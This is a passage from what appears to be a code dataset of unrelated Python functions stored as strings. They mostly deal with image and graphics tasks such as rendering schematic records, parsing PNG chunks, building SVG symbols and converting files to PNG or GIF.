o[\"NAME\"].lower() != match:\n continue\n val = o[\"TEXT\"]\n break\n else:\n raise LookupError(\"Parameter value for |OWNERINDEX={}|TEXT={}\".format(obj[\"OWNERINDEX\"].decode(\"ascii\"), obj[\"TEXT\"].decode(\"ascii\")))\n 
renderer.text(val.decode(\"ascii\"),\n colour=colour(obj[\"COLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n **kw)\n else:\n text(renderer, obj, **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"ISMIRRORED\", \"LOCATION.X_FRAC\", \"LOCATION.Y_FRAC\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"FONTID\", \"TEXT\", \"NAME\", \"READONLYSTATE\"} and\n obj[\"RECORD\"] == Record.DESIGNATOR and obj[\"OWNERPARTID\"] == b\"-1\" and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"NAME\"] == b\"Designator\" and obj[\"READONLYSTATE\"] == b\"1\"):\n desig = obj[\"TEXT\"].decode(\"ascii\")\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if int(owner[\"PARTCOUNT\"]) > 2:\n desig += chr(ord(\"A\") + int(owner[\"CURRENTPARTID\"]) - 1)\n renderer.text(desig, (int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n colour=colour(obj[\"COLOR\"]),\n font=\"font\" + obj[\"FONTID\"].decode(),\n )\n \n elif (obj.keys() >= {\"RECORD\", \"OWNERPARTID\", \"OWNERINDEX\", \"LOCATIONCOUNT\", \"X1\", \"X2\", \"Y1\", \"Y2\"} and\n obj[\"RECORD\"] == Record.POLYLINE and obj.get(\"ISNOTACCESIBLE\", b\"T\") == b\"T\" and obj.get(\"LINEWIDTH\", b\"1\") == b\"1\"):\n if obj[\"OWNERPARTID\"] == b\"-1\":\n current = True\n else:\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n current = (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\"))\n if current:\n polyline(renderer, obj)\n \n elif (obj.keys() - {\"OWNERPARTDISPLAYMODE\", \"INDEXINSHEET\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"COLOR\", \"ISNOTACCESIBLE\", \"LINEWIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"CORNER.X\", \"CORNER.Y\"} and\n obj[\"RECORD\"] == Record.LINE and obj[\"ISNOTACCESIBLE\"] == b\"T\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\")):\n renderer.line(\n colour=colour(obj[\"COLOR\"]),\n width=int(obj[\"LINEWIDTH\"]),\n a=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n b=(int(obj[\"CORNER.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"NAME\", \"SWAPIDPIN\", \"OWNERPARTDISPLAYMODE\", \"ELECTRICAL\", \"DESCRIPTION\", \"SWAPIDPART\", \"SYMBOL_OUTEREDGE\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"DESIGNATOR\", \"FORMALTYPE\", \"LOCATION.X\", \"LOCATION.Y\", \"PINCONGLOMERATE\", \"PINLENGTH\"} and\n obj[\"RECORD\"] == Record.PIN and obj[\"FORMALTYPE\"] == b\"1\"):\n if obj[\"OWNERPARTID\"] == objects[1 + int(obj[\"OWNERINDEX\"])][\"CURRENTPARTID\"]:\n pinlength = int(obj[\"PINLENGTH\"])\n pinconglomerate = int(obj[\"PINCONGLOMERATE\"])\n offset = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n rotate = pinconglomerate & 3\n with renderer.view(offset=offset, rotate=rotate) as view:\n kw = dict()\n points = list()\n if \"SYMBOL_OUTEREDGE\" in obj:\n view.circle(2.85, (3.15, 0), width=0.6)\n points.append(6)\n points.append(pinlength)\n electrical = obj.get(\"ELECTRICAL\", PinElectrical.INPUT)\n marker = pinmarkers[electrical]\n if marker:\n kw.update(startarrow=marker)\n view.hline(*points, **kw)\n \n if pinconglomerate >> 1 & 1:\n invert = -1\n kw = dict(angle=180)\n else:\n invert = +1\n kw = dict()\n if pinconglomerate & 8 and \"NAME\" in obj:\n view.text(overline(obj[\"NAME\"]),\n vert=view.CENTRE,\n horiz=view.RIGHT * invert,\n offset=(-7, 0),\n **kw)\n if pinconglomerate & 
16:\n designator = obj[\"DESIGNATOR\"].decode(\"ascii\")\n view.text(designator,\n horiz=view.LEFT * invert,\n offset=(+9, 0),\n **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"ORIENTATION\", \"STYLE\", \"ISCROSSSHEETCONNECTOR\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"LOCATION.X\", \"LOCATION.Y\", \"SHOWNETNAME\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.POWER_OBJECT and obj[\"OWNERPARTID\"] == b\"-1\"):\n orient = obj.get(\"ORIENTATION\")\n if obj.get(\"ISCROSSSHEETCONNECTOR\") == b\"T\":\n marker = dchevron\n offset = 14\n else:\n (marker, offset) = connmarkers.get(obj[\"STYLE\"], (None, 0))\n \n col = colour(obj[\"COLOR\"])\n translate = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n with renderer.view(colour=col, offset=translate) as view:\n kw = dict()\n if orient:\n kw.update(rotate=int(orient))\n view.draw(marker, **kw)\n \n if obj[\"SHOWNETNAME\"] != b\"F\":\n orients = {\n b\"2\": (renderer.RIGHT, renderer.CENTRE, (-1, 0)),\n b\"3\": (renderer.CENTRE, renderer.TOP, (0, -1)),\n None: (renderer.LEFT, renderer.CENTRE, (+1, 0)),\n b\"1\": (renderer.CENTRE, renderer.BOTTOM, (0, +1)),\n }\n (horiz, vert, pos) = orients[orient]\n t = obj[\"TEXT\"].decode(\"ascii\")\n pos = (p * offset for p in pos)\n view.text(t, pos, horiz=horiz, vert=vert)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"OWNERPARTDISPLAYMODE\", \"ISSOLID\", \"LINEWIDTH\", \"CORNERXRADIUS\", \"CORNERYRADIUS\", \"TRANSPARENT\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"AREACOLOR\", \"COLOR\", \"CORNER.X\", \"CORNER.Y\", \"ISNOTACCESIBLE\", \"LOCATION.X\", \"LOCATION.Y\"} and\n obj[\"RECORD\"] in {Record.RECTANGLE, Record.ROUND_RECTANGLE} and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj.get(\"ISSOLID\", b\"T\") == b\"T\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\")):\n kw = dict(width=0.6, outline=colour(obj[\"COLOR\"]))\n if \"ISSOLID\" in obj:\n kw.update(fill=colour(obj[\"AREACOLOR\"]))\n a = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n b = (int(obj[\"CORNER.\" + x]) for x in \"XY\")\n \n if obj[\"RECORD\"] == Record.ROUND_RECTANGLE:\n r = list()\n for x in \"XY\":\n radius = obj.get(\"CORNER{}RADIUS\".format(x))\n if radius is None:\n radius = 0\n else:\n radius = int(radius)\n r.append(int(radius))\n renderer.roundrect(r, a, b, **kw)\n else:\n renderer.rectangle(a, b, **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"FONTID\", \"LOCATION.X\", \"LOCATION.Y\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.NET_LABEL and obj[\"OWNERPARTID\"] == b\"-1\"):\n renderer.text(overline(obj[\"TEXT\"]),\n colour=colour(obj[\"COLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"OWNERPARTDISPLAYMODE\", \"STARTANGLE\", \"SECONDARYRADIUS\"} == {\"RECORD\", \"OWNERPARTID\", \"OWNERINDEX\", \"COLOR\", \"ENDANGLE\", \"ISNOTACCESIBLE\", \"LINEWIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"RADIUS\"} and\n obj[\"RECORD\"] in {Record.ARC, Record.ELLIPTICAL_ARC} and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"LINEWIDTH\"] == b\"1\" and obj.get(\"OWNERPARTDISPLAYMODE\", b\"1\") == b\"1\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (owner[\"CURRENTPARTID\"] == obj[\"OWNERPARTID\"] and\n owner.get(\"DISPLAYMODE\", b\"0\") == obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\")):\n r = int(obj[\"RADIUS\"])\n if obj[\"RECORD\"] == 
Record.ELLIPTICAL_ARC:\n r2 = obj.get(\"SECONDARYRADIUS\")\n if r2 is None:\n r2 = 0\n else:\n r2 = int(r2)\n else:\n r2 = r\n \n start = float(obj.get(\"STARTANGLE\", 0))\n end = float(obj[\"ENDANGLE\"])\n centre = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n renderer.arc((r, r2), start, end, centre,\n colour=colour(obj[\"COLOR\"]),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"LINEWIDTH\"} > {\"RECORD\", \"AREACOLOR\", \"COLOR\", \"ISNOTACCESIBLE\", \"ISSOLID\", \"LOCATIONCOUNT\", \"OWNERINDEX\", \"OWNERPARTID\"} and\n obj[\"RECORD\"] == Record.POLYGON and obj[\"AREACOLOR\"] == b\"16711680\" and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"ISSOLID\"] == b\"T\" and obj.get(\"LINEWIDTH\", b\"1\") == b\"1\" and obj[\"OWNERPARTID\"] == b\"1\"):\n points = list()\n for location in range(int(obj[\"LOCATIONCOUNT\"])):\n location = format(1 + location)\n points.append(tuple(int(obj[x + location]) for x in \"XY\"))\n renderer.polygon(fill=colour(obj[\"COLOR\"]), points=points)\n elif (obj.keys() - {\"INDEXINSHEET\", \"ISNOTACCESIBLE\", \"OWNERINDEX\", \"ORIENTATION\", \"JUSTIFICATION\", \"COLOR\"} == {\"RECORD\", \"FONTID\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.LABEL):\n if obj[\"OWNERPARTID\"] == b\"-1\" or obj[\"OWNERPARTID\"] == objects[1 + int(obj[\"OWNERINDEX\"])][\"CURRENTPARTID\"]:\n text(renderer, obj)\n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"COLOR\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\"} and\n obj[\"RECORD\"] == b\"22\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n col = colour(obj[\"COLOR\"])\n location = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n renderer.draw(nc, location, colour=col)\n elif (obj.keys() - {\"CLIPTORECT\"} == {\"RECORD\", \"ALIGNMENT\", \"AREACOLOR\", \"CORNER.X\", \"CORNER.Y\", \"FONTID\", \"ISSOLID\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\", \"Text\", \"WORDWRAP\"} and\n obj[\"RECORD\"] == b\"28\" and obj[\"ALIGNMENT\"] == b\"1\" and obj[\"AREACOLOR\"] == b\"16777215\" and obj.get(\"CLIPTORECT\", b\"T\") == b\"T\" and obj[\"ISSOLID\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"WORDWRAP\"] == b\"T\"):\n lhs = int(obj[\"LOCATION.X\"])\n renderer.text(\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n offset=(lhs, int(obj[\"CORNER.Y\"])),\n width=int(obj[\"CORNER.X\"]) - lhs,\n text=obj[\"Text\"].decode(\"ascii\").replace(\"~1\", \"\\n\"),\n vert=renderer.TOP,\n )\n \n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"LINEWIDTH\", \"COLOR\", \"LOCATIONCOUNT\", \"X1\", \"Y1\", \"X2\", \"Y2\", \"X3\", \"Y3\", \"X4\", \"Y4\"} and\n obj[\"RECORD\"] == Record.BEZIER and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"1\" and obj[\"LINEWIDTH\"] == b\"1\" and obj[\"LOCATIONCOUNT\"] == b\"4\"):\n col = colour(obj[\"COLOR\"])\n points = list()\n for n in range(4):\n n = format(1 + n)\n points.append(tuple(int(obj[x + n]) for x in \"XY\"))\n renderer.cubicbezier(*points, colour=col)\n \n elif (obj.keys() - {\"RADIUS_FRAC\", \"SECONDARYRADIUS_FRAC\"} == {\"RECORD\", \"OWNERINDEX\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"RADIUS\", \"SECONDARYRADIUS\", \"COLOR\", \"AREACOLOR\", \"ISSOLID\"} and\n obj[\"RECORD\"] == Record.ELLIPSE and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj.get(\"RADIUS_FRAC\", b\"94381\") == b\"94381\" and obj[\"SECONDARYRADIUS\"] == obj[\"RADIUS\"] and obj.get(\"SECONDARYRADIUS_FRAC\", b\"22993\") == b\"22993\" and obj[\"ISSOLID\"] == b\"T\"):\n renderer.circle(\n 
r=int(obj[\"RADIUS\"]),\n width=0.6,\n outline=colour(obj[\"COLOR\"]), fill=colour(obj[\"AREACOLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"SYMBOLTYPE\"} == {\"RECORD\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"XSIZE\", \"YSIZE\", \"COLOR\", \"AREACOLOR\", \"ISSOLID\", \"UNIQUEID\"} and\n obj[\"RECORD\"] == Record.SHEET_SYMBOL and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"ISSOLID\"] == b\"T\" and obj.get(\"SYMBOLTYPE\", b\"Normal\") == b\"Normal\"):\n renderer.rectangle((int(obj[\"XSIZE\"]), -int(obj[\"YSIZE\"])),\n width=0.6,\n outline=colour(obj[\"COLOR\"]), fill=colour(obj[\"AREACOLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"FONTID\", \"TEXT\"} and\n obj[\"RECORD\"] in {Record.SHEET_NAME, Record.SHEET_FILE_NAME} and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n text(renderer, obj)\n \n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\", \"INDEXINSHEET\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"CORNER.X\", \"CORNER.Y\", \"EMBEDIMAGE\", \"FILENAME\"} and\n obj[\"RECORD\"] == Record.IMAGE and obj[\"OWNERINDEX\"] == b\"1\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"EMBEDIMAGE\"] == b\"T\" and obj[\"FILENAME\"] == b\"newAltmLogo.bmp\"):\n location = list()\n corner = list()\n for x in \"XY\":\n location.append(int(obj[\"LOCATION.\" + x]))\n corner.append(int(obj[\"CORNER.\" + x]))\n renderer.rectangle(location, corner, width=0.6)\n \n else:\n print(\"\".join(\"|{}={!r}\".format(p, v) for (p, v) in sorted(obj.items())), file=stderr)\n \n renderer.finish()", "def perform_symbolization(self): # pragma: no cover\n # pylint: disable=redefined-variable-type\n if os.path.isfile(self.start_location):\n files = [self.start_location]\n else:\n files = self._get_files()\n\n for filename in files:\n print(\"Processing file -- {0}\".format(filename))\n updated_file_text = ''\n updated_file_text = ''\n with open(filename, 'r') as fin:\n for line in fin.readlines():\n new_line = self.replace_id_with_symbol(line)\n\n if not updated_file_text and new_line:\n updated_file_text = new_line\n elif new_line:\n updated_file_text += new_line\n\n with open(filename, 'w') as fout:\n fout.write(updated_file_text)", "def _add_png(self, pngfile):\n with open(pngfile, 'rb') as png:\n if png.read(8) != self.magic:\n raise ValueError(\"{} is not a PNG file\".format(pngfile))\n while True:\n chead = png.read(8)\n if len(chead) == 0:\n break\n clen, ctype = struct.unpack(\">L4s\", chead)\n cdata = png.read(clen)\n ccrc = png.read(4)\n utype = ctype.decode(\"ascii\")\n self._current_chunk = (chead[:4], ctype, cdata, ccrc)\n if ctype in self.mustmatch:\n ref = self._matchref.get(ctype)\n if ref is None:\n self._matchref[ctype] = cdata\n self._copy()\n else:\n if cdata != ref:\n raise ValueError(\"Chunk {} mismatch\".format(utype))\n met = (\"_first_\" if self._first else \"_next_\") + utype\n try:\n met = getattr(self, met)\n except AttributeError:\n pass\n else:\n met(cdata)\n self._first = False", "def run(self):\n generated_gif = self.generate()\n with open(self.out_filename, 'wb') as out_fd:\n out_fd.write(generated_gif)", "def run_turtle_program(source):\n ast = parser.parse(source)\n\n t = turtle.Turtle()\n for stmt in ast.statement:\n do_statement(stmt, t)\n canvas = turtle.Screen().getcanvas()\n canvas.postscript(file='image.eps')\n 
img = Image.open('image.eps')\n img.save('image.png', 'png')\n turtle.Screen().bye()\n return 'image.png'", "def gen_symbols(path, strip):\n\n symbols = ''\n svg_namespace = 'http://www.w3.org/2000/svg'\n etree.register_namespace('', svg_namespace)\n\n for root, dirs, files in os.walk(os.path.abspath(path)):\n for wwsfile in files:\n basename, extension = os.path.splitext(wwsfile)\n if extension == '.svg':\n filepath = os.path.join(root, wwsfile)\n try:\n svg = etree.parse(filepath)\n svg_root = svg.getroot()\n\n attribs = svg_root.attrib\n desc = svg.find('{'+svg_namespace+'}desc')\n svg_root.remove(desc)\n title = svg.find('{'+svg_namespace+'}title')\n svg_root.remove(title)\n metadata = svg.find('{'+svg_namespace+'}metadata')\n svg_root.remove(metadata)\n\n viewbox_attrib = 'viewBox'\n if viewbox_attrib in attribs:\n viewbox = attribs[viewbox_attrib]\n else:\n viewbox = f\"0 0 {attribs['width']} {attribs['height']}\"\n\n basename2 = basename.replace(strip, '')\n symbols += f'<symbol id=\"{basename2}\" viewBox=\"{viewbox}\">'\n\n for element in svg_root:\n symbols += etree.tostring(element).decode('utf-8')\n symbols += '</symbol>'\n\n except Exception as err:\n warnings.warn(f'Could not parse file {filepath}: {err}')\n\n return symbols", "def AA2Image(readpath, savepath, header, font_data):\n if not os.path.isdir(savepath):\n os.makedirs(savepath)\n print('convert txt to png. save path: ', savepath)\n\n files = glob.glob(readpath+'*.txt')\n\n for file in files:\n ascii_art = AsciiArt(file)\n ascii_art_image = ascii_art.image(font_data)\n filename = header + os.path.basename(file)[:-4] + '.png'\n ascii_art_image = Image.fromarray(ascii_art_image)\n ascii_art_image = ascii_art_image.convert('L')\n ascii_art_image.save(savepath + filename)\n print('saved ', filename)", "def main():\n argvs = sys.argv\n argc = len(argvs)\n if argc == 1:\n print('usage: convert2png.py <path/to/*.ppm> ...')\n sys.exit(1)\n\n os.makedirs('result/convert2png', exist_ok=True)\n\n for i in range(1, argc):\n img = cv2.imread(argvs[i])\n\n # root, ext = os.path.splitext(argvs[i])\n # cv2.imwrite(root + '.png', img)\n\n root, ext = os.path.splitext(argvs[i])\n strImgName = root.split('/')[-1]\n cv2.imwrite('result/convert2png/' + strImgName + '.png', img)", "def postprocess_file(config: Config, dfs: DFs) -> None:\n if SymbolDF.name in dfs:\n dfs[SymbolDF.name] = postprocess_symbols(config, dfs[SymbolDF.name])", "def get_carbon_image(fName):\r\n\r\n print(f'On File {fName}')\r\n\r\n global driver\r\n with open(fName) as f:\r\n code = f.read()\r\n\r\n code = urllib.parse.quote_plus(code)\r\n url = CARBON.format(code=code)\r\n\r\n\r\n driver.get(url)\r\n\r\n driver.find_element_by_xpath(\"//button[contains(text(),'Export')]\").click()\r\n driver.find_element_by_xpath(\"//button[contains(text(),'Open')]\").click()\r\n sleep(5) # this might take a bit\r\n driver.save_screenshot(fName.strip('.py')+'.png')\r\n print(f\"{fName.strip('.py')+'.png'} saved.\")\r\n return True", "def new_func():\n dirname, _ = os.path.split(os.path.abspath(__file__))\n pngfile = os.path.sep.join([dirname, \"out.png\"])\n img = [\"110010010011\", \"101011010100\", \"110010110101\", \"100010010011\"]\n img = [[int(val) for val in value] for value in img]\n writer = png.Writer(len(img[0]), len(img), greyscale=True, bitdepth=16)\n with open(pngfile, \"wb\") as file:\n writer.write(file, img)\n try:\n func(pngfile)\n finally:\n os.remove(pngfile)", "def process(image):\n pass", "def main():\n\n import codecs\n\n file_path = 
'../sample_texts/hi-Deva.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 'hindi.png',\n family='Noto Sans Devanagari', language='hi', rtl=False)\n\n file_path = '../sample_texts/ar-Arab.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 'arabic.png',\n family='Noto Naskh Arabic', language='ar', rtl=True)\n\n file_path = '../sample_texts/mn-Mong.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 'mong.png',\n family='Noto Sans Mongolian', language='mn', vertical=True, rtl=False)", "def processIconFilename(self):\n\t\tself.iconFilename = self._getVal(64, 2)", "def make_image(self, frame, filename, **kwds):\n p = plot.plot(frame, **kwds)\n p.save_image(filename)", "def convert_gif(ctx):\n ctx.run(\n 'ffmpeg '\n '-i resources/demo.mkv -filter_complex \"[0:v] palettegen\" '\n 'resources/palette.png',\n pty=True\n )\n ctx.run(\n 'ffmpeg -i resources/demo.mkv '\n '-i resources/palette.png '\n '-filter_complex \"[0:v][1:v] paletteuse\" '\n 'resources/demo.gif',\n pty=True\n )", "def write(self, symFile):\n logging.debug(\"Writing Symbol \"+self.name)\n for polygon in self.polygons:\n symFile.write(polygon.symRep())\n for wire in self.wires:\n symFile.write(wire.symRep())\n for text in self.texts:\n symFile.write(text.symRep())\n for pin in self.pins:\n symFile.write(pin.symRep())\n for circle in self.circles:\n symFile.write(circle.symRep())\n for rectangle in self.rectangles:\n symFile.write(rectangle.symRep())", "def handle_as_file(view: View, point: int, string: str):\n # \"screenshot.png\"\n\n name = osp.basename(string)\n file, folder = get_file(view, string, name)\n\n # if file doesn't exist, return\n if not osp.isfile(file):\n return\n\n # does the file need conversion ?\n need_conversion = file.endswith(FORMAT_TO_CONVERT)\n\n # if the file needs conversion, convert it and read data from the resulting png\n if need_conversion:\n # keep the image's file and name for later use\n conv_file = file\n conv_name = name\n\n # create a temporary file\n tmp_file = osp.join(TEMP_DIR, \"tmp_png.png\")\n name = osp.splitext(name)[0] + \".png\"\n\n # use the magick command of Imagemagick to convert the image to png\n magick(file, tmp_file)\n\n file = tmp_file\n\n with open(file, \"rb\") as f:\n encoded = str(base64.b64encode(f.read()), \"utf-8\")\n\n real_width, real_height, size = get_image_size(file)\n width, height = get_dimensions(view, file)\n size = str(size // 1024) + \"KB\" if size >= 1024 else str(size) + 'B'\n\n def on_navigate(href):\n\n if href == \"save\":\n if need_conversion:\n save(conv_file, conv_name, \"file\")\n else:\n save(file, name, \"file\", folder)\n elif href == \"save_as\":\n convert(conv_file if need_conversion else file, \"file\")\n else:\n sublime.active_window().open_file(file)\n\n view.show_popup(\n TEMPLATE % (width, height, \"png\", encoded, real_width,\n real_height, size),\n sublime.HIDE_ON_MOUSE_MOVE_AWAY,\n point,\n *view.viewport_extent(),\n on_navigate=on_navigate)", "def main():\n convert(\"env_100000.mp4\", TargetFormat.GIF)", "def save_to_image_file(self, filename, image_format='png', scale_x=1, scale_y=1):\n\n self.save_barcode_to_pillow(scale_x=scale_x, scale_y=scale_y).save(filename,\n format=image_format)", "def save_as_png(file_name, path = DEFAULT_PATH):\n plt.ioff()\n plt.savefig(path + 
file_name + '.png')\n plt.close()", "def postprocess_symbols(config: Config, symbols: SymbolDF) -> SymbolDF:\n files = []\n arms = []\n arm_symbols = {}\n current_file = ''\n current_arm = ''\n has_file = False\n if config['collect.prefix-file']:\n prefixes = config.get_re('collect.prefix')\n else:\n prefixes = None\n if 'type' in symbols.columns:\n for symbol in symbols.itertuples():\n if symbol.type == 'FILE':\n has_file = True\n current_file = symbol.symbol\n if prefixes:\n current_file = simplify_source(current_file, prefixes)\n\n elif symbol.type == 'NOTYPE':\n if symbol.symbol.startswith('$'):\n if current_arm or symbol.symbol in ARM_SPECIAL_SYMBOLS:\n current_arm = symbol.symbol\n arm_symbols[current_arm] = True\n files.append(current_file)\n arms.append(current_arm)\n\n if has_file:\n symbols['file'] = files\n if current_arm:\n symbols['arm'] = arms\n\n if has_file:\n symbols = symbols[symbols['type'] != 'FILE']\n if current_arm:\n syms = arm_symbols.keys()\n symbols = symbols[~symbols.symbol.isin(syms)]\n return symbols", "def do_icon(srcfn, magnitude):\n img = Image.open(\"%s.png\" % (srcfn, ))\n draw = ImageDraw.Draw(img)\n (width, _height) = FONT.getsize(magnitude)\n # 40 pixel wide, we want to center it\n x0 = int(20 - (width / 2.))\n draw.text((x0, 8), magnitude, font=FONT, fill=(0, 0, 0, 255))\n img.save((\"../../htdocs/icons/lsr/%s/%s.png\"\n ) % (srcfn, magnitude))\n del img\n del draw", "def process(self, image):", "def decode(n_pir,template,localtime,draw,bin_display):\n template_filename=template+\"%02d\"\n\n for n in range(n_pir):\n decode_in_file=template_filename%(n+1)\n decode_out_file=decode_in_file+\"_parsed.txt\"\n click.echo(\"Working on file: %s\"%decode_out_file)\n buff_size=8\n try:\n with open(decode_in_file,'rb') as i: #\n with open(decode_out_file,'w') as o:\n #Header\n o.write('Time,Status\\n')\n while True:\n anteroom=i.read(buff_size)\n if anteroom==b'':\n break\n anteroom_tuple=struct.unpack('=If',anteroom)\n time_=anteroom_tuple[0]\n status=anteroom_tuple[1]\n if localtime:\n time_=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time_))\n o.write('%s,%f\\n'%(time_,status))\n else:\n o.write('%i,%f\\n'%(time_,status))\n except FileNotFoundError:\n continue\n if draw:\n actogram(template_filename, n_pir, bin_display)", "def dofigure(line):\n global fnum\n if 'onlineonlycolor' not in line:\n fnum += 1\n locate = re.search(r\"\\{([\\w\\d\\-_]+)\\}\", line)\n if not locate:\n raise RuntimeError(\"Could not find image in line '{}'\".format(line))\n imagetext = locate.group(1)\n imname, ftype = findfigure(imagetext)\n if 'plottwo' in line:\n imname2 = line.split('{')[2].split('}')[0]\n # print name and number\n print(fnum+'a', imname)\n print(fnum+'b', imname2)\n _, subname = os.path.split(imname)\n _, subname2 = os.path.split(imname2)\n ftype = os.path.splitext(subname)\n # rename with number if desired\n subname = outfigname(fnum, ftype, char=\"a\")\n outname = os.path.join(outdir, subname)\n subname2 = outfigname(fnum, ftype, char=\"b\")\n outname2 = os.path.join(outdir, subname2)\n # copy over\n os.system(\"cp \"+imname+\" \"+outname)\n os.system(\"cp \"+imname2+\" \"+outname2)\n # write out plot string\n newline = line.replace(imagetext, subname)\n newline = newline.replace(imname2, subname2)\n else:\n # print name and number\n print(fnum, imname)\n _, subname = os.path.split(imname)\n # rename with number if desired\n subname = outfigname(fnum, ftype)\n outname = os.path.join(outdir, subname)\n # copy over\n os.system(\"cp \"+imname+\" 
\"+outname)\n # write out plot string\n newline = line.replace(imagetext, subname)\n return(newline)", "def render(filename,i):\n print('running render')\n A = np.genfromtxt(filename,skip_header=1,dtype=float,delimiter=',')\n img = np.array(A[i,:],copy=True)\n print(img.shape)\n img = img.reshape(28,28)\n img = 255 - img\n print(img.shape)\n plt.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\n plt.savefig(\"img\" + str(i)+\"render\"+ \".png\")", "def create_png(dotfile=\"tree.dot\", pngfile=\"tree.png\"):\n dotfile = utils.get_abspath(dotfile)\n pngfile = utils.get_abspath(pngfile)\n cmd = create_cmd(dotfile, pngfile)\n subprocess.run(cmd, check=True)", "def save_plot(p, file_name, path='../static/images/'):\n p.output_backend = \"svg\"\n export_svgs(p, filename=path + file_name + '.svg')", "def toPng(self):\n\t\tif self.isPng:\n\t\t\treturn self\n\t\telse:\n\t\t\treturn textureFile( self.path.replace( self.extension, '.png' ) )", "def generate(self, chars, format='png'):\n im = self.generate_image(chars)\n out = BytesIO()\n im.save(out, format=format)\n out.seek(0)\n return out", "def draw(self, output_file):\n self.calc_width()\n self.calc_height()\n\n surface = cairo.SVGSurface(output_file, self.width, self.height)\n ctx = cairo.Context(surface)\n\n ## change background color\n ctx.rectangle(0, 0, self.width, self.height)\n ctx.set_source_rgb(1, 1, 1)\n ctx.fill()\n\n ## Variables\n line_spacing = 125\n line_depth = 125\n header_depth = 75\n left_spacing = 35\n\n ## Create custom color palette\n color_palette = [[],[],[]]\n num_colors_per = self.number_of_motifs//3\n max_num_colors_per = self.number_of_motifs - (2 * num_colors_per)\n gradient = 1/num_colors_per\n max_gradient = 1/max_num_colors_per\n # color_gradient_value = \n for i in 